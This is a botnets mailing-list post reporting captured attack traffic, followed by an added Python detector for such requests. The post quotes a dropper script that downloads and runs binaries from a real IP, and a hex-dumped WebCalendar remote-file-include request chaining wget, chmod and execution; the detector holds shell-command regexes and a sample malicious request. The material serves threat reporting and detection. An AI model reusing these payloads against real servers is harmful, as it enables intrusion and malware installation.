To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
On 17/03/06, Jamie Riden <[EMAIL PROTECTED]> wrote:
>
> Anyway, this morning we're back to the usual shell script -
>
> #!/bin/bash
> wget 209.200.224.166/foc
> chmod 744 foc
> ./foc
> wget 209.200.224.166/iron
> chmod 744 iron
> ./iron

Someone's also trying to use this vulnerability to drop code - http://www.osvdb.org/displayvuln.php?osvdb_id=18954
(Snort is erroneously flagging it as the older http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-1049)

000 : 47 45 54 20 2F 77 65 62 63 61 6C 65 6E 64 61 72   GET /webcalendar
010 : 2F 73 65 6E 64 5F 72 65 6D 69 6E 64 65 72 73 2E   /send_reminders.
020 : 70 68 70 3F 69 6E 63 6C 75 64 65 64 69 72 3D 68   php?includedir=h
030 : 74 74 70 3A 2F 2F 38 33 2E 31 36 2E 31 38 37 2E   ttp://83.16.187.
040 : 36 2F 63 6D 64 2E 64 61 74 3F 26 63 6D 64 3D 63   6/cmd.dat?&cmd=c
050 : 64 25 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30   d%20/tmp;wget%20
060 : 38 33 2E 31 36 2E 31 38 37 2E 36 2F 68 61 69 74   83.16.187.6/hait
070 : 61 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32 30   a;chmod%20744%20
080 : 68 61 69 74 61 3B 2E 2F 68 61 69 74 61 3B 65 63   haita;./haita;ec
090 : 68 6F 25 32 30 59 59 59 3B 65 63 68 6F 7C 20 20   ho%20YYY;echo|
0a0 : 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 32   HTTP/1.1.Host: 2
0b0 : 30 33 2E 31 31 34 2E 31 33 37 2E 39 0A 55 73 65   03.114.137.9.Use
0c0 : 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61   r-Agent: Mozilla
0d0 : 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65   /4.0 (compatible
0e0 : 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64   ; MSIE 6.0; Wind
0f0 : 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A         ows NT 5.1;)..

_______________________________________________
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
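
Added example, not part of the original post: a small log-triage check for requests shaped like the one in the capture above, where an include-style parameter carries a remote URL and a second parameter carries shell commands. The parameter-name and command heuristics are assumptions chosen for illustration, and the sample request lines are constructed with documentation addresses.

```python
import re
from urllib.parse import unquote

# Heuristics below are assumptions for illustration, not a vendor signature.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
INCLUDE_HINT = re.compile(r"inc|dir|path|file|page", re.I)
SHELL_HINT = re.compile(r"\b(?:wget|curl|chmod)\b|(?:^|[;|&\s])\./\w+")

def request_target(request_line):
    """Extract the request target, tolerating raw spaces before ' HTTP/x.y'."""
    _method, _, rest = request_line.partition(" ")
    return rest.rsplit(" HTTP/", 1)[0].strip()

def analyze(request_line):
    """Return findings for one HTTP request line (empty list means clean)."""
    _path, _, query = request_target(request_line).partition("?")
    findings = []
    # Split on '&' only: ';' is part of the command string, not a separator.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote(raw)
        # A remote URL is only suspicious in a parameter that looks like it
        # feeds an include path; redirect-style parameters are left alone.
        if REMOTE_URL.match(value) and INCLUDE_HINT.search(name):
            findings.append(f"remote-include:{name}")
        if SHELL_HINT.search(value):
            findings.append(f"shell-command:{name}")
    return findings

# Constructed sample request lines (192.0.2.0/24 is a documentation range).
SAMPLES = [
    "GET /webcalendar/send_reminders.php?includedir=http://192.0.2.10/cmd.dat?"
    "&cmd=cd%20/tmp;wget%20192.0.2.10/x;chmod%20744%20x;./x;echo|  HTTP/1.1",
    "GET /webcalendar/month.php?date=20060317 HTTP/1.1",
    "GET /index.php?next=https://example.org/welcome HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line) or "clean", "<-", request_target(line)[:60])
```

Splitting the query on `&` alone keeps the `;`-chained command in one value, so it is reported as a single finding per parameter.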
